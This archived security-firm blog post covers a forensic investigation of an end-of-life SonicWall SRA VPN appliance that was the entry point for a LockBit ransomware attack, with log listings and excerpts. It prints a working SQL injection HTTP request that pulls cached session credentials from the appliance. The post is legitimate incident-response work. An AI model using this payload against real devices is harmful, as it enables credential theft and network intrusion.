VPN Appliance Forensics – Compass Security Blog
Archived: 2026-04-05 17:52:21 UTC
During a DFIR (Digital Forensics and Incident Response) Case, we encountered an ESXi Hypervisor that was
encrypted by the Ransomware LockBit 2.0. Suspicious SSH logons on the Hypervisor originated from an End-of-Life VPN Appliance (SonicWall SRA 4600). It turns out, this was the initial entry point for the Ransomware
attack. Follow us into the forensics analysis of this compromised device.
Finding the Logs
After isolating the VPN Appliance from the Internet and from the internal Network, the customer gave us the
credentials for the web based administration interface.
Unfortunately, all log listings in the graphical interfaces were almost empty:
https://blog.compass-security.com/2022/03/vpn-appliance-forensics/
Page 1 of 17
After sifting through all the available features, we found an interesting Tech Support Report feature under System
> Diagnostics:
The feature downloads a ZIP file containing interesting logs of the system and an export of its configuration:
status.txt
persist.db.log.1
mcd.log.1
eventlog.1
geoBotD.log.1
https://blog.compass-security.com/2022/03/vpn-appliance-forensics/
Page 2 of 17
tunneld.conf
tunneld.log
vmctl.log
wafStats.db.log
smtp.conf
sonicfiles.log
sso_proxy.log
temp.db.log
settings.json
smm.log
mcd.log
nxlog.log
persist.db.log
kernel.log
logrotate.conf
logrotateVA.conf
httpd.log
httpd.log.1
geoBotD.log
ha.log
html5Client.log
examples.db.log
firebase.conf
firebase.log
ftpd.log
dhcpc.log
dtls.log
eventlog
boot.log
clientsDownload.log
These logs hold very valuable information, if and only if the system was not shut down. The following files in
particular were of interest:
eventlog
The eventlog records successful and failed logins on both the VPN and the web interface. The following
information is also recorded:
timestamp
username
source IP address
Nov 26 11:26:26 sslvpn SSLVPN: id=sslvpn sn=[CUT-BY-COMPASS] time="2021-11-26 09:26:26" vp_time="2021-11-26 09
Nov 26 11:28:02 sslvpn SSLVPN: id=sslvpn sn=[CUT-BY-COMPASS] time="2021-11-26 09:28:02" vp_time="2021-11-26 09:2
Nov 26 11:28:05 sslvpn SSLVPN: id=sslvpn sn=[CUT-BY-COMPASS] time="2021-11-26 09:28:05" vp_time="2021-11-26 09:2
https://blog.compass-security.com/2022/03/vpn-appliance-forensics/
Page 3 of 17
Nov 26 11:28:05 sslvpn SSLVPN: id=sslvpn sn=[CUT-BY-COMPASS] time="2021-11-26 09:28:05" vp_time="2021-11-26 09:2
Nov 26 11:28:06 sslvpn SSLVPN: id=sslvpn sn=[CUT-BY-COMPASS] time="2021-11-26 09:28:06" vp_time="2021-11-26 09:2
Nov 27 11:07:39 sslvpn SSLVPN: id=sslvpn sn=C0EAE4915E4C time="2021-11-27 10:07:39" vp_time="2021-11-27 10:07:39
Nov 27 11:35:43 sslvpn SSLVPN: id=sslvpn sn=C0EAE4915E4C time="2021-11-27 10:35:43" vp_time="2021-11-27 10:35:43
mcd.log
The mcd.log records successful VPN connections. The following information is also recorded:
assigned IP address from the VPN IP address pool
username
source IP address from where the connection was established
2021-11-26 09:28:06:mcd 23888: MCD launched [RIP:10.100.132.100;UNAME:xyz;CIP:[CUT-BY-COMPASS]]
2021-11-26 09:28:08:mcd 23888: SSL VPN: Connected
2021-11-26 10:11:08:mcd 23888: Signal Recd (2). Exiting...
2021-11-26 10:11:08:mcd 23888: Cleaned up routes and proxy arp
2021-11-26 10:11:08:mcd 23888: NxSession sync'd up
2021-11-26 10:11:08:mcd 23888: Stat files cleaned up
2021-11-26 10:11:08:mcd 23888: MCD shutdown.
This log went back to the last start of the system, therefore giving a very long audit trail.
httpd.log
The httpd.log records requests to the web server. This included traces of used exploit techniques. We will now
dive into these.
Reconstructing the Attack
Through analysis of the event logs, suspicious logons could be identified. The source IP address was located in
countries where the customer had no employees and the logon times were unusual and matched with the
Ransomware attack. However, it was at first not clear if the attacker obtained credentials through phishing or
through a vulnerability in the VPN appliance.
The appliance was not on the company’s inventory and therefore they were not aware that an EOL device was
running in their network.
Hence we searched online to see if there were known flaws in this particular firmware version.
Unauthenticated SQL Injection
The used firmware was vulnerable to an unauthenticated SQL injection, that allows to read cached credentials of
active sessions from the database. For more information about this issues, check the writeup by Crowdstrike.
https://blog.compass-security.com/2022/03/vpn-appliance-forensics/
Page 4 of 17
SonicWall issued a patch for this issue. However, because the SRA 4600 appliance is considered End-of-Life, no
Firmware upgrade was released for the device.
The leaked cached credentials are plaintext VPN user passwords, encrypted with a key that is hardcoded in the
appliances firmware. The following request was crafted based on the vulnerability writeup. It allowed us to test
the exploitability against the SRA appliance:
POST /cgi-bin/supportInstaller HTTP/1.1
Host: 10.100.132.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
fromEmailInvite=1&customerTID="impossible'+UNION+SELECT+0,0,userType,userName,0,password,0,0+FROM+Sessions+LIMIT
If there is a session on the device, the encrypted password is returned in the supportcode JavaScript variable:
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2021 14:40:21 GMT
Server: SonicWALL SSL-VPN Web Server
X-FRAME-OPTIONS: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src https://*.duosecurity.com 'self' 'unsafe-inline' 'unsafe-eval'; object-src '
Referrer-Policy: strict-origin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3141
[CUT BY COMPASS}